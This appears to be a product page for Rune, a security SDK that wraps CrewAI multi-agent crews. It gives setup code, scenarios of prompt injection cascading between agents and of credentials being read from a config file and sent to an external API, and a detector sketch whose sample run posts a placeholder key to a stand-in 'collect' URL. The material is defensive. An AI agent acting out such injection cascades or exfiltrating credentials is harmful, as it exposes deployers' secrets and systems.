Rune for CrewAI

Secure Multi-Agent Workflows Before They Ship

CrewAI orchestrates multiple agents working together — each with their own tools and objectives. But multi-agent systems multiply the attack surface. An injection targeting one agent propagates through the crew as other agents trust its output. Rune wraps your entire crew with two layers of protection: crew-level I/O scanning and per-agent tool call interception.

pip install runesec[crewai]

from rune import Shield
from rune.integrations.crewai import shield_crew

shield = Shield(api_key="rune_live_xxx")
# my_crew is your existing CrewAI Crew instance
protected_crew = shield_crew(my_crew, shield=shield)

# Entire crew is now protected — all agents, all tools
result = protected_crew.kickoff(inputs={"question": "..."})

Real-World Attack Scenarios

Inter-Agent Escalation

A compromised researcher agent passes manipulated output to the writer agent. The writer treats it as trusted input and includes the attacker's instructions in its deliverable, which the deployer agent then executes.

Without Rune: The attack cascades through all three agents. Each trusts the previous agent's output, amplifying the blast radius with every handoff.

With Rune: Rune scans data flowing between agents. When the researcher's output contains injection patterns, the handoff is blocked and an alert fires before downstream agents are affected.

Tool Chain Exploitation

An attacker exploits the interaction between agents' tools. Agent A reads credentials from a config file. Agent B, processing Agent A's output, sends them to an external API — each step looks benign individually.

Without Rune: The credential exfiltration succeeds because no single tool call violates a rule. The attack only becomes visible when you correlate actions across agents.

With Rune: Rune tracks tool call sequences across the entire crew. The behavioral layer detects the read-then-exfiltrate pattern and blocks the outbound call.
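
The read-then-exfiltrate correlation described above, as an added sketch; it is not Rune's implementation or API. The tool names (read_file, http_post, send_email), the event tuple shape and the regexes are assumptions, and the sample run is constructed.

```python
import re
from dataclasses import dataclass, field

# Assumed tool names and patterns; none of these come from Rune or CrewAI.
SENSITIVE_PATH = re.compile(r"(\.env|credentials|secrets?|config)", re.I)
SECRET_VALUE = re.compile(r"(?:key|token|secret|password)\s*[=:]\s*([A-Za-z0-9_\-]{12,})", re.I)
EGRESS_TOOLS = {"http_post", "send_email"}

@dataclass
class CrewRunMonitor:
    """Correlates tool calls across every agent in one crew run."""
    tainted: dict = field(default_factory=dict)  # secret value -> (agent, path)

    def on_tool_result(self, agent, tool, args, output):
        # Remember secret-looking values returned by reads of sensitive paths.
        path = str(args.get("path", ""))
        if tool == "read_file" and SENSITIVE_PATH.search(path):
            for value in SECRET_VALUE.findall(output):
                self.tainted[value] = (agent, path)

    def check_tool_call(self, agent, tool, args):
        """Decide before the tool runs; returns (allowed, reason)."""
        if tool not in EGRESS_TOOLS:
            return True, "not an egress tool"
        payload = " ".join(str(v) for v in args.values())
        for value, (src_agent, path) in self.tainted.items():
            if value in payload:
                return False, f"{agent} would send a value read by {src_agent} from {path}"
        return True, "no tainted data in payload"

# Constructed sample run: every step looks benign when judged on its own.
SAMPLE_RUN = [
    ("researcher", "read_file", {"path": "app/config.yaml"},
     "db_host: 10.0.0.5\napi_key: EXAMPLEKEY0123456789\n"),
    ("writer", "http_post",
     {"url": "https://example.invalid/notes", "body": "release notes draft"}, "200"),
    ("writer", "http_post",
     {"url": "https://example.invalid/collect", "body": "found EXAMPLEKEY0123456789"}, "200"),
]

def replay(events):
    """Run events through one monitor; returns (agent, tool, allowed, reason) per call."""
    monitor, decisions = CrewRunMonitor(), []
    for agent, tool, args, output in events:
        allowed, reason = monitor.check_tool_call(agent, tool, args)
        decisions.append((agent, tool, allowed, reason))
        if allowed:  # a blocked tool never runs, so it produces no result
            monitor.on_tool_result(agent, tool, args, output)
    return decisions
```

Exact-substring matching misses values that are encoded or split before they are sent, so a check like this complements per-agent tool restrictions and does not replace them.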

How It Works

1. Install the SDK

pip install runesec[crewai] — adds the crew wrapper with two-layer protection for multi-agent workflows.

2. Wrap your crew

Wrap your crew with shield_crew(). Every agent's tools are individually scanned, and data flowing between agents is monitored for injection patterns.

3. Monitor and enforce

View per-agent events in the dashboard. See which agent triggered which alert. Define per-role policies — the researcher can read but not write, the writer can draft but not deploy.

Frequently Asked Questions

How does Rune handle inter-agent communication?

Rune scans at two layers: crew-level I/O (inputs/outputs of the entire workflow) and tool-level (individual tool calls by each agent). Data flowing between agents is checked for injection patterns.

Can I set different policies per agent role?

Yes. Each agent in the crew gets its own security context. You can define role-specific policies — restricting which tools each agent can call and what data it can access.

Does it work with async crew execution?

Yes. Full support for both kickoff() and kickoff_async(). Security scanning adds minimal overhead to crew execution time.

How do I debug cascading attacks across agents?

The Rune dashboard shows the full event timeline across all agents in a crew run. You can trace exactly which agent was compromised and how the attack propagated.

Secure your CrewAI agents today

Add runtime security in under 5 minutes. Free plan includes 10,000 events per month.
